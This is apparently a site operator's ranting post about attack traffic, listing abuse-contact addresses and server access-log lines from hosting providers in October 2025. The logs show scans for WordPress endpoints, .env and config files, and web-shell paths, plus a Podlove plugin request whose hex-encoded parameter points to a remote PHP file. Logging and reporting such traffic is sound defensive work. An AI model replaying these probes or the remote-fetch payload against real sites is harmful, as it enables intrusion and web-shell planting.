AS212238 – Datacamp Limited – AGAIN AND AGAIN EVERY DAY!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ONLY 1 ANSWER, NO MORE INFO! – NEEDS UP TO 48 HOURS TO DO ANYTHING!!! THIS IS A NOGO!
169.150.203.202 website*x.com – – [04/Oct/2025:04:24:10 +0200] „GET /wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.202 website*x.com – – [04/Oct/2025:04:24:10 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.202 website*x.com – – [04/Oct/2025:04:24:10 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.202 website*x.com – – [04/Oct/2025:04:24:10 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.202 website*x.com – – [04/Oct/2025:04:24:11 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.202 website*x.com – – [04/Oct/2025:04:24:11 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.202 website*x.com – – [04/Oct/2025:04:24:11 +0200] „GET /website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.202 website*x.com – – [04/Oct/2025:04:24:12 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.202 website*x.com – – [04/Oct/2025:04:24:12 +0200] „GET /news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.202 website*x.com – – [04/Oct/2025:04:24:12 +0200] „GET /2018/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.202 website*x.com – – [04/Oct/2025:04:24:12 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.202 website*x.com – – [04/Oct/2025:04:24:13 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.202 website*x.com – – [04/Oct/2025:04:24:13 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.202 website*x.com – – [04/Oct/2025:04:24:13 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.202 website*x.com – – [04/Oct/2025:04:24:14 +0200] „GET /media/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.202 website*x.com – – [04/Oct/2025:04:24:14 +0200] „GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.202 website*x.com – – [04/Oct/2025:04:24:14 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.202 website*x.com – – [04/Oct/2025:04:24:14 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.202 website*x.com – – [04/Oct/2025:04:24:14 +0200] „GET /sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“

ABUSE-MAIL NR. 2 – WEEKEND!

abuse@mts.by,abuse@as210558.net,abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de

AS25106 – Mobile TeleSystems JLLC – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
BELARUS IS COMPLETE UNWANTED AND COMPLETE BLOCKED!!!
134.17.14.34 website*x.com – – [04/Oct/2025:05:27:16 +0200] „GET /style.php HTTP/1.0“ 302 20 „-“ „Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)“

AS210558 – 1337 Services GmbH – AGAIN AND AGAIN EVERY DAY!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
84.54.33.23 website*x.com – – [04/Oct/2025:06:09:17 +0200] „POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
84.54.33.23 website*x.com – – [04/Oct/2025:06:09:17 +0200] „GET /wp-content/themes/seotheme/db.php?u HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
84.54.33.23 website*x.com – – [04/Oct/2025:06:09:17 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
84.54.33.23 website*x.com – – [04/Oct/2025:06:09:17 +0200] „POST /wp-plain.php HTTP/1.0“ 302 – „www.google.com“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
84.54.33.23 website*x.com – – [04/Oct/2025:06:09:17 +0200] „POST /alfacgiapi/perl.alfa HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
84.54.33.23 website*x.com – – [04/Oct/2025:06:09:26 +0200] „POST /wp-plain.php HTTP/1.0“ 302 – „www.google.com“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

AS51167 – Contabo GmbH – AGAIN AND AGAIN EVERY DAY!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
DAILY REFERRER-SPAM TO DUBIOUS WEBSITE BINANCE.COM AND THIS PROVIDER DOES NOTHING ABOUT THIS SPAMMER-IDIOTS!
HERE WITH 2 IP´S – PLUS HACKING ATTEMPTS ALMOST EVERY DAY!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
207.180.203.50 website*x.com – – [04/Oct/2025:06:13:14 +0200] „GET /wp-admin/css/ HTTP/1.0“ 403 – „binance.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“
+
84.247.146.115 website*x.com – – [04/Oct/2025:19:22:54 +0200] „GET /style.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“

ABUSE-MAIL NR. 3 – WEEKEND!

abuse@ionos.com,luismiguel.gonzalez@itmglobal.es,abuse@dfn.de

AS8560 – IONOS SE – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
SCANNING FOR EMAIL-ADDRESSES IS A NOGO!!! VERY UNWANTED!!! EmailScraper GO AWAY!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2a02:2479:2e:9e00::1 www.website*x.de – – [03/Oct/2025:23:01:05 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; EmailScraper/1.0; +https://example.com/bot)“
2a02:2479:2e:9e00::1 www.website*x.de – – [03/Oct/2025:23:01:05 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; EmailScraper/1.0; +https://example.com/bot)“
2a02:2479:2e:9e00::1 www.website*x.de – – [03/Oct/2025:23:01:06 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; EmailScraper/1.0; +https://example.com/bot)“

AS14061 – DigitalOcean, LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ALWAYS ANSWERED IN OUR ABUSE EMAILS! – ALWAYS STOP THIS HACKER-IDIOTS! – THIS IS VERY GOOD!
139.59.157.225 www.website*x.de – – [04/Oct/2025:07:09:03 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0 Safari/537.36“

AS198355 – I.T.M. Instalaciones y Mantenimiento de Telecomunicaciones S.L. – NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
37.18.242.1 www.website*x.de – – [04/Oct/2025:17:01:00 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:40.0) Gecko/20100101 Firefox/40.0“

AS680 – Verein zur Foerderung eines Deutschen Forschungsnetzes e.V. – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
THIS IS NOT THE FIRST HACKING ATTEMPT! – MANY OTHER LOCATIONS HAVE ALREADY BEEN COMPLETELY BLOCKED BEFORE!
139.18.2.214 www.website*x.de – – [04/Oct/2025:19:05:06 +0200] „GET /xmlrpc.php HTTP/1.0“ 302 – „https://www.website*x.de/?amp=1“ „LCC (+http://corpora.uni-leipzig.de/crawler_faq.html)“
139.18.2.214 www.website*x.de – – [04/Oct/2025:19:05:15 +0200] „GET /wp-json/ HTTP/1.0“ 200 203455 „https://www.website*x.de/?amp=1“ „LCC (+http://corpora.uni-leipzig.de/crawler_faq.html)“
139.18.2.214 www.website*x.de – – [04/Oct/2025:19:05:25 +0200] „GET /wp-json/wp/v2/pages/5 HTTP/1.0“ 200 7558 „https://www.website*x.de/?amp=1“ „LCC (+http://corpora.uni-leipzig.de/crawler_faq.html)“
139.18.2.214 www.website*x.de – – [04/Oct/2025:19:05:34 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 302 – „https://www.website*x.de/?amp=1“ „LCC (+http://corpora.uni-leipzig.de/crawler_faq.html)“
139.18.2.214 www.website*x.de – – [04/Oct/2025:19:05:43 +0200] „GET / HTTP/1.0“ 200 162597 „https://www.website*x.de/?amp=1“ „LCC (+http://corpora.uni-leipzig.de/crawler_faq.html)“
139.18.2.214 www.website*x.de – – [04/Oct/2025:19:05:51 +0200] „GET /wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.website*x.de%2F HTTP/1.0“ 200 2477 „https://www.website*x.de/?amp=1“ „LCC (+http://corpora.uni-leipzig.de/crawler_faq.html)“
139.18.2.214 www.website*x.de – – [04/Oct/2025:19:06:00 +0200] „GET /wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.website*x.de%2F&format=xml HTTP/1.0“ 200 2641 „https://www.website*x.de/?amp=1“ „LCC (+http://corpora.uni-leipzig.de/crawler_faq.html)“
… and so on…!!!

ABUSE-MAIL NR. 4 – WEEKEND!

abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca,abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de, abuse@att.net

AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ALWAYS ANSWERED IN OUR ABUSE EMAILS! – ALWAYS STOP THIS HACKER-IDIOTS! – THIS IS VERY GOOD!
51.195.68.11 website*x.com – – [03/Oct/2025:18:47:44 +0200] „GET /wp-login.php?wpaas-standard-login=1 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
51.195.68.11 website*x.com – – [03/Oct/2025:18:47:44 +0200] „POST /wp-login.php?wpaas-standard-login=1 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS51167 – Contabo GmbH – AGAIN AND AGAIN EVERY DAY!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
DAILY REFERRER-SPAM TO DUBIOUS WEBSITE BINANCE.COM AND THIS PROVIDER DOES NOTHING ABOUT THIS SPAMMER-IDIOTS!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
185.135.137.81 website*x.com – – [04/Oct/2025:08:05:41 +0200] „GET /wp-admin/css/ HTTP/1.0“ 403 – „binance.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“

AS7018 – AT&T Enterprises, LLC – VERY IGNORANT AND UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
69.232.98.21 website*x.com – – [04/Oct/2025:17:18:40 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

ABUSE-MAIL NR. 5 – WEEKEND!

admin@blnwx.com,ip.misuse@airtel.com,Rahul3.Jain@airtel.com,abuse@support.ftr.com,ipadmin@support.ftr.com,abuse@virtualine.org

AS399629 – BL Networks – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
64.190.113.201 website*x.de – – [03/Oct/2025:19:38:36 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „python-requests/2.32.3“
64.190.113.201 website*x.de – – [03/Oct/2025:19:38:36 +0200] „POST / HTTP/1.0“ 403 – „-“ „python-requests/2.32.3“
64.190.113.201 website*x.de – – [03/Oct/2025:19:38:37 +0200] „GET /?%3Cplay%3Ewithme%3C/%3E HTTP/1.0“ 403 – „-“ „python-requests/2.32.3“
64.190.113.201 website*x.de – – [03/Oct/2025:19:38:37 +0200] „POST / HTTP/1.0“ 403 – „-“ „python-requests/2.32.3“
64.190.113.201 website*x.de – – [03/Oct/2025:19:38:37 +0200] „POST / HTTP/1.0“ 403 – „-“ „python-requests/2.32.3“
64.190.113.201 website*x.de – – [03/Oct/2025:19:38:47 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „python-requests/2.32.3“
64.190.113.201 website*x.de – – [03/Oct/2025:19:38:48 +0200] „POST / HTTP/1.0“ 403 – „-“ „python-requests/2.32.3“
64.190.113.201 website*x.de – – [03/Oct/2025:19:38:48 +0200] „GET /?%3Cplay%3Ewithme%3C/%3E HTTP/1.0“ 403 – „-“ „python-requests/2.32.3“
64.190.113.201 website*x.de – – [03/Oct/2025:19:38:49 +0200] „POST / HTTP/1.0“ 403 – „-“ „python-requests/2.32.3“
64.190.113.201 website*x.de – – [03/Oct/2025:19:38:49 +0200] „POST / HTTP/1.0“ 403 – „-“ „python-requests/2.32.3“

AS24560 – Bharti Airtel Ltd., Telemedia Services – AGAIN AND AGAIN EVERY DAY!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
223.230.125.145 website*x.de – – [04/Oct/2025:06:03:30 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS5650 – Frontier Communications of America, Inc. – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
47.187.128.121 website*x.de – – [04/Oct/2025:06:07:04 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.3; x64) AppleWebKit/537.36 (KHTML, like Gecko) Opera/72.0.0.0 Safari/537.36“

ABUSE-MAIL NR. 6 – WEEKEND!

report@abuseradar.com,abuse-manual@advinservers.com,abuse@vmheaven.io,abuse@support.ftr.com,abuse@privatesystems.net,noc@chtech.net.br,mail-abuse@cert.br

AS206216 – Advin Services LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
45.8.22.56 website*x.com – – [03/Oct/2025:21:43:30 +0200] „GET /index.php?podlove_image_cache_url=68747470733a2f2f6933302e627a2f6769662f6769662e706870&podlove_file_name=qrczhsza HTTP/1.0“ 302 20 „www.google.com“ „Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0“
45.8.22.56 website*x.com – – [03/Oct/2025:21:43:52 +0200] „GET /index.php?podlove_image_cache_url=68747470733a2f2f6933302e627a2f6769662f6769662e706870&podlove_file_name=qrczhsza HTTP/1.0“ 302 20 „www.google.com“ „Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0“

VMHeaven – AGAIN AND AGAIN EVERY DAY!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
45.156.87.98 website*x.com – – [04/Oct/2025:02:14:52 +0200] „GET /wp-admin/install.php HTTP/1.0“ 302 – „-“ „Python-urllib/2.7“

AS63410 – PrivateSystems Networks – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
IS NOW ANSWERED AND HAS STOP THIS HACKER-IDIOTS! – THIS IS VERY GOOD!
162.255.162.178 website*x.com – – [04/Oct/2025:06:25:16 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0“

AS271206 – Ch Informatica Ltda – AGAIN AND AGAIN EVERY DAY!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
BRAZIL IS COMPLETE UNWANTED AND COMPLETE BLOCKED! – TO MANY IGNORANT PROVIDERS AND TO MANY HACKER-IDIOTS EVERY DAY!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2804:77e4:fa16:7700:f0f6:ba94:de88:7d41 website*x.com – – [04/Oct/2025:06:42:14 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; x86) AppleWebKit/537.36 (KHTML, like Gecko) Safari/10.0.0.0 Safari/537.36“

ABUSE-MAIL NR. 7 – WEEKEND!

abuse@worldhost.group,abuse@microsoft.com, msftcs@microsoft.com,cert@microsoft.com,abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de

AS199404 – WHG Hosting Services Ltd – AGAIN AND AGAIN EVERY DAY!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
103.118.17.156 website*x.com – – [03/Oct/2025:22:59:32 +0200] „GET /.vscode/sftp.json HTTP/1.0“ 403 – „-“ „-“

AS51167 – Contabo GmbH – AGAIN AND AGAIN EVERY DAY!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
194.195.87.55 website*x.com – – [04/Oct/2025:13:52:31 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://website*x.com/wp-admin/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36“

ABUSE-MAIL NR. 8 – WEEKEND!

abuse@convergeict.com,abuse@tube-hosting.de,abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca,abuse@vmheaven.io

AS17639 – Converge ICT Solutions Inc. – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
210.4.113.66 website*x.de – – [04/Oct/2025:01:16:43 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; x86) AppleWebKit/537.36 (KHTML, like Gecko) Opera/77.0.0.0 Safari/537.36“

AS49581 – Ferdinand Zink trading as Tube-Hosting – AGAIN AND AGAIN!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2.58.113.138 website*x.de – – [04/Oct/2025:03:27:01 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“

AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ALWAYS ANSWERED IN OUR ABUSE EMAILS! – ALWAYS STOP THIS HACKER-IDIOTS! – THIS IS VERY GOOD!
37.59.21.100 www.website*x.de – – [04/Oct/2025:05:30:47 +0200] „GET /atom HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.66 Safari/537.36“

VMHeaven – HERE WITH 4 IP´S!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
HERE WE HAVE A 403 BUT WHEN THERE IS A 200 THIS HACKER-IDIOTS TRY TO HACKING!!!
156.233.84.170 website*x.de – – [04/Oct/2025:07:12:21 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
154.213.161.121 website*x.de – – [04/Oct/2025:07:12:21 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
156.242.41.75 website*x.de – – [04/Oct/2025:07:12:21 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
156.253.169.52 website*x.de – – [04/Oct/2025:07:12:22 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“

ABUSE-MAIL NR. 9 – WEEKEND!

ip.abuse@ril.com,abuse@cyberghost.ro,abuse@vdsina.ru

AS55836 – Reliance Jio Infocomm Limited – AGAIN AND AGAIN EVERY DAY!!! – VERY UNWANTED AND IGNORANT!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2405:201:a800:5195:f08f:7805:7bcf:1edb website*x.com – – [04/Oct/2025:08:09:54 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; x86) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/97.0.0.0 Safari/537.36“

AS61272 – Informacines sistemos ir technologijos, UAB – AGAIN AND AGAIN EVERY DAY!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
HERE WE HAVE A 403 BUT WHEN THERE IS A 200 THIS HACKER-IDIOTS TRY TO HACKING!!!
194.32.122.53 website*x.com – – [04/Oct/2025:12:30:50 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36“
194.32.122.53 website*x.com – – [04/Oct/2025:12:30:50 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36“
194.32.122.53 website*x.com – – [04/Oct/2025:12:30:50 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36“
194.32.122.53 website*x.com – – [04/Oct/2025:12:30:50 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36“

AS48282 – Hosting technology LTD – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
VDSINA AND ALSO RUSSIA IS VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
91.184.244.117 website*x.com – – [04/Oct/2025:19:28:51 +0200] „GET /wp-includes/ID3/license.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
91.184.244.117 website*x.com – – [04/Oct/2025:19:28:51 +0200] „GET /feed/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
